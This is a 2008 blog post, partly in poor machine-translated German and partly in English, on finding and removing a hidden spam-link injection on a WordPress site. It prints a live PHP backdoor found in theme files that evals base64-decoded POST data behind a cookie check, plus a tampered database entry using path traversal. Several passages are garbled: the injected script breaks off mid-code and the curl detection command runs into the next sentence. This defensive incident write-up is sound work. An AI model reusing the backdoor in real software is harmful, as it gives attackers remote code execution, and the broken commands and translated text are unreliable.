26. Mai 2008 mysurface Posted in, | Hits: 342393 |
Wir von versteckten Spam-Link-Injektion (eine modifizierte Version von Goro Spam-Injektion) getroffen worden, spritzt dieser Riss Spam-Links durch Wordpress wp_footer () oder wp_head () Haken. Die Spam-Links sich nur offenbaren, wenn sie von Suchmaschinen-Bot wie Googlebot gecrawlt, und sie sind von unseren Augen verborgen. Wir glauben, dass der Cracker Zweck Suchindex zu stehlen ist und verbessert ihre Page Rank.
Diese Taten sind sehr schwer zu erkennen, weil Sie nicht die versteckten Spam-Links von Ihrer Web-Quelle finden können, wenn Sie Ihre Seite mit Web-Browser surfen. Bis eines Tages, geht Ihre Verkehre exponentiell nach unten, und entdeckten die Spam-Links in Google Cache angezeigt werden. Aber das ist zu spät!
Wie geht es sehen die Spam-Links:
<Div id = "_ wp_footer">..... ALLE SPAM Links ......
<script type="text/javascript"><!-- google_ad_client = "pub-7652328300112263"; google_ad_width = 728; google_ad_height = 15; google_ad_format = "728x15_0ads_al_s"; google_ad_channel = ""; function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; id google_ads("//--> </script> How to detects them? We can’t wait until the exploit been discover by googlebot and ruin our google index, so there must be a way for us to verify at any time. For us, we use . Changing the user agent to googlebot with curl and crawl your own page like this:
curl --no-sessionid --user-agent "Googlebot/2.1 (+ Thanks to Toydi, we have done some findings on how the exploit affects us. Here, let us tells you what we have learn from the exploit, suggestion to solve the problems, and reveal of this exploit.
How to solve this? Once you realized your site been exploit, what you must have in your mind is upgrade your WordPress, and removes the infected files. There is a fastest way to temporary stop the spam injection. Removes wp_footer() and wp_head() hook from your themes. The hook should be store in footer.php and header.php.
Removes footer and header hooks does not really clean the affected files, but the spam links will disappear if you check with curl again. This doesn’t really solve the problems.
Where are the affected files? Affected files can be any where, they probably have a common name, but crackers may change the name patterns any time for the next attempt. So, we highly suggest you do a fresh install unless it is too much trouble for you to do that.
The affected files can be stay at
/wp-content/uploads/wp-content/plugins/wp-content/themes/wp-includes/wp-admins/
with patterns such ask *_new.php, *_old.php, *.jpgg, *.giff, *.pngg, wp-info.txt
Removes them in a batch using find command line, you can access your ftp server with .
find . -name "*_new.php" -exec rm {} \;find . -name "*_old.php" -exec rm {} \;find . -name "*.jpgg" -exec rm {} \;find . -name "*_giff" -exec rm {} \;find . -name "*_pngg" -exec rm {} \;
In fact, infected files can be any php files, compare them with the original one. Some of the images are actually not image, use file command to verify them. we find one of the gif file in my theme/images folder is actually a encrypted php codes. The cracker is very smart to hide that from detected!
file * | grep -v image
Check every files of your themes, we discovered injected codes at our headers.php and singles.php:
<?php if(md5($_COOKIE['_wp_debugger'])=="2435265e6253721e9a8e200d1ebbc54e"){ eval(base64_decode($_POST['file'])); exit; } ?>
See!? cracker decodes his php codes with base64_decode()!!! They try to blind your eyes from detecting them.
Database exploits We modified the add_action() in plugin.php to print out all function names registered to 'wp_footer' action hook. Then, we caught a strange function name, echo123, but we couldn’t find echo123 in our wordpress codes as well as in database. But after we connects WordPress with new database, the spam links gone. So, it must be something wrong within the database. And our guess is right!
1. The cracker modify the active_plugins field of wp_options table.
a:3:{i:0;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd";i:1;s:46:"../../wp-content/themes/default/header_old.gif";i:2;s:27:"SK2/spam_karma_2_plugin.php";}
../../../../../../../../../../../../../../../../../../../../../../tmp/tmpYwbXT2/sess_779ceef92a4fdcc17bb5ee3f13348bfd and ../../wp-content/themes/default/header_old.gif are the exploit codes, removes them accordingly.
2. If wordpress_options and internal_links_cache fields exist in your wp_options table, removes them, they are your nightmare!!!
3. Check your wp_users table and removes ‘WordPress’ user.
For WordPress database exploit, please refers to .
It probably more than 3 fields, if you discover extra infected fields, please let us know, thanks in advance.
Who is behind this? Seriously We don’t know, but based on what we have, we make some guess, feel free to give yours.
From the spam injection, we observed that the spam links appended with a modified google adsense script with key pub-7652328300112263. Who’s key is that? Do he steal your income as well as messing your google index? Only google adsense team would able to answer this.
From the spam links, its all redirection to wwwDOTyeah-oopsDOTcom and titusonenineDOTclassicalanglicanDOTnet, are they the cracker? I tried to email them asking why they crack my page, but of cause until today, I didn’t received any replies from them.
P.S. Replace DOT with . I do not want to create more keywords for them anymore.
Okay, let us crawl their web with user agent as googlebot
curl --user-agent "Googlebot/2.1 (+| less
Surprisingly their page are been injected with spam too, but the links redirect to wwwDOTarticulateDOTcom/blog/
And crawl further, there are no more spam links injected. Heh! Who are they?
I suggest you to check your blogs frequently with curl, take fast action before they mess up your google index again.
Related Posts When I 1st time using Linux OS, the 1st command I use is 'ls' ;p Why I want use 'ls'? Of cause want to listing the files... Since tee can read the standard input, and write to multiple files, we may leverage this feature so that it writes to mu... By typing date on your terminal, it will display current date and time like: #output Wed Aug 23 08:00:58 MYT 2006 But...